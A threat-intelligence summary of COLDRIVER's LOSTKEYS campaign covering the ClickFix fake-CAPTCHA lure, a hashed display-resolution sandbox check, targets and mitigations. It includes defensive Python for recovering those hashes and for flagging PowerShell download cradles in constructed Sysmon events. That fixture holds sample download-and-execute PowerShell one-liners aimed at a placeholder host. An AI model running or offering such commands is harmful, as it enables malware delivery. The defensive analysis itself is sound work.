New LOSTKEYS malware has been identified and linked to COLDRIVER by GTIG, stealing files and system data in targeted attacks
Analysis Summary
# Threat Actor: COLDRIVER
## Attribution & Identity
Attributed to a threat actor linked to the **Russian government**.
Known aliases and associated groups: **COLDRIVER** (tracked elsewhere as UNC4057, Star Blizzard and Callisto).
## Activity Summary
COLDRIVER was observed in January, March and April 2025 deploying a newly identified malware family named LOSTKEYS. This marks an evolution from the group's long-standing credential phishing toward custom malware that gives the operator direct access to the victim's device.
## Tactics, Techniques & Procedures
- Deploys a novel malware named **LOSTKEYS**.
- Uses a multi-step infection chain, described here as **three stages**:
  - **Stage 1:** A lure website presents a fake CAPTCHA that instructs the visitor to copy a **PowerShell** command and paste it into the Windows Run prompt (the ClickFix social-engineering pattern); the user, not an exploit, launches the first stage.
  - **Stage 2:** The downloaded script computes the **MD5 hash of the display resolution** and halts if the digest matches a hard-coded value, a check intended to stop execution inside virtual machines and analysis sandboxes.
  - **Stage 3:** If the check passes, the script retrieves and executes the remaining stages, ending with the LOSTKEYS payload, which collects files and system information from the host.
- Historically known for **credential phishing**.
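The second-stage check above hashes the resolution rather than comparing it directly, so the blocklisted values are not readable from the script; because the space of plausible resolutions is tiny, an analyst recovers them by hashing candidates. The following is an added example of that recovery, not code from the GTIG report or from LOSTKEYS: the target digests are constructed here from resolutions chosen for illustration, and the candidate list, string formats and encodings are the analyst's assumptions about how such a script might render the value.

```python
"""Recovering the display resolutions behind a hashed VM/sandbox check.

Added example, not code from the report. The target digests below are
constructed from chosen resolutions, not the report's values; the
candidate resolutions, formats and encodings are assumptions.
"""
import hashlib
import itertools

# Common physical displays plus defaults hypervisors tend to present.
CANDIDATES = [(800, 600), (1024, 768), (1280, 720), (1280, 800), (1280, 1024),
              (1366, 768), (1440, 900), (1600, 900), (1920, 1080), (2560, 1440)]
# Ways a script might render width and height before hashing (assumed).
FORMATS = ["{w}x{h}", "{w} x {h}", "{w},{h}", "{w}{h}", "{w}*{h}"]
# PowerShell scripts commonly hash either UTF-8 or UTF-16LE ("Unicode") bytes.
ENCODINGS = ["utf-8", "utf-16le"]


def md5_hex(text, encoding="utf-8"):
    """MD5 of the text in the given encoding, as lowercase hex."""
    return hashlib.md5(text.encode(encoding)).hexdigest()


def candidate_table(candidates=CANDIDATES, formats=FORMATS, encodings=ENCODINGS):
    """Map every candidate digest to (rendered string, encoding)."""
    table = {}
    for (w, h), fmt, enc in itertools.product(candidates, formats, encodings):
        rendered = fmt.format(w=w, h=h)
        table[md5_hex(rendered, enc)] = (rendered, enc)
    return table


def recover(target_digests, **kwargs):
    """Return {digest: (resolution string, encoding)} for digests the table explains."""
    table = candidate_table(**kwargs)
    return {d.lower(): table[d.lower()] for d in target_digests if d.lower() in table}


def would_halt(width, height, target_digests, fmt="{w}x{h}", encoding="utf-8"):
    """Emulate the check: does this resolution, rendered this way, hit the blocklist?"""
    digest = md5_hex(fmt.format(w=width, h=height), encoding)
    return digest in {d.lower() for d in target_digests}


# Constructed stand-ins for the hard-coded digests (not the report's values).
TARGETS = [md5_hex("1024x768"), md5_hex("800x600", "utf-16le"), md5_hex("1280x1024")]

if __name__ == "__main__":
    for digest, (res, enc) in recover(TARGETS).items():
        print(f"{digest}  {res!r} ({enc})")
    print("sandbox at 1024x768 would halt:", would_halt(1024, 768, TARGETS))
```

Once the blocklisted resolutions are known, `would_halt` tells you whether a given sandbox image will trip the check; the practical fix is to give analysis VMs a display resolution outside the recovered set before detonating the second stage.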
## Targeting
- Target profile: **diplomats**, **NGO staff** and **intelligence personnel**.
- Geography: **Western** organisations and individuals, consistent with COLDRIVER's earlier campaigns.
- Victims: no specific organizations are named; the focus is on high-value individuals in governmental and non-governmental organizations.
## Tools & Infrastructure
- Malware families used: **LOSTKEYS**.
- The initial delivery involves a **lure website** displaying a fake CAPTCHA.
- Infrastructure details (C2 domains, IP addresses, file hashes) are not included in this summary; the full GTIG report should be consulted for indicators.
## Implications
COLDRIVER is demonstrating capability evolution, moving beyond credential theft to custom, multi-stage malware (LOSTKEYS) that performs an environment check (the hashed display-resolution test) before deploying its payload, so that it runs on real victim hosts and not in analysis sandboxes. This raises the threat level for the group's traditional targets: once the operator has code execution on the device, strong passwords and phishing-resistant sign-in no longer protect the files and session data on it.
## Mitigations
- Keep **continuous monitoring** for compromised credentials in place; COLDRIVER's credential phishing has not gone away, LOSTKEYS sits alongside it.
- Educate users to recognize lure websites, in particular any "verification" or CAPTCHA page that asks them to copy a command and paste it into the Run prompt or a terminal; a legitimate CAPTCHA never requires running a script.
- Deploy endpoint detection and response (EDR) that records PowerShell process creation with parent process and full command line, and alert on PowerShell launched interactively (explorer.exe as parent, as from the Run prompt) with download cradles, hidden-window or encoded-command switches.
- The display-resolution check runs inside a downloaded script, not on the command line, so enable PowerShell script block logging (Event ID 4104) to capture the second stage's content, and give analysis sandboxes a non-default display resolution so the check does not silently stop the sample before the payload is observed.
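The stage-1 step in the infection chain and the EDR mitigation above both come down to one telemetry question: was PowerShell started from an interactive shell with a command line that fetches and runs remote code? The following added example (not code or data from the GTIG report) triages constructed Sysmon Event ID 1 records for that pattern. Field names (`Image`, `ParentImage`, `CommandLine`) follow Sysmon's schema; the events, the `lure.invalid` host and the indicator thresholds are constructed for illustration and are not indicators from the report.

```python
"""Triage of constructed process-creation telemetry for the LOSTKEYS
stage-1 pattern: PowerShell launched interactively (explorer.exe parent,
as for the Win+R Run prompt) whose command line carries a download cradle,
a hidden window, or an encoded command.

Added example; events are constructed, not real LOSTKEYS telemetry.
"""
import base64
import binascii
import re
from pathlib import PureWindowsPath

SHELLS = {"powershell.exe", "pwsh.exe"}
# explorer.exe parents the Run prompt and desktop shortcuts; PowerShell
# spawned by a build tool or IDE is normal and is not flagged.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Tokens a pasted one-liner needs to fetch and run the next stage.
CRADLE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|net\.webclient|iex|invoke-expression)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
# -e, -ec, -enc ... -EncodedCommand all take base64 of UTF-16LE script.
# The {16,} guard keeps '-ExecutionPolicy Bypass' from matching.
ENCODED = re.compile(r"-e[a-z]{0,13}\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or '' if none."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", "replace")
    except (binascii.Error, ValueError):
        return ""


def indicators(event):
    """Reasons this process-creation event looks like a pasted stage-1 loader."""
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    if image not in SHELLS or parent not in INTERACTIVE_PARENTS:
        return []
    cmd = event["CommandLine"]
    reasons = []
    if CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if HIDDEN.search(cmd):
        reasons.append("hidden window")
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded command")
        if CRADLE.search(decoded):
            reasons.append("download cradle in decoded command")
    return reasons


def triage(events):
    """Return (event index, reasons) for every event with at least one indicator."""
    hits = []
    for i, ev in enumerate(events):
        if ev.get("EventID") != 1:
            continue
        reasons = indicators(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed Sysmon Event ID 1 records, reduced to the fields used here.
# lure.invalid is a placeholder host, not an indicator from the report.
EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://lure.invalid/a -UseBasicParsing).Content"'},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd /c dir"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -EncodedCommand "
     + base64.b64encode("IEX (iwr http://lure.invalid/b).Content".encode("utf-16le")).decode()},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for idx, reasons in triage(EVENTS):
        print(idx, EVENTS[idx]["CommandLine"][:60], reasons)
```

The parent-process condition is what keeps this from paging on every scripted build; the cost is that a paste into an already-open terminal has a different parent (the terminal host), so in production the same indicators should also be evaluated with the console host as parent, and the second stage, which never appears on a command line, has to come from script block logging rather than from process creation.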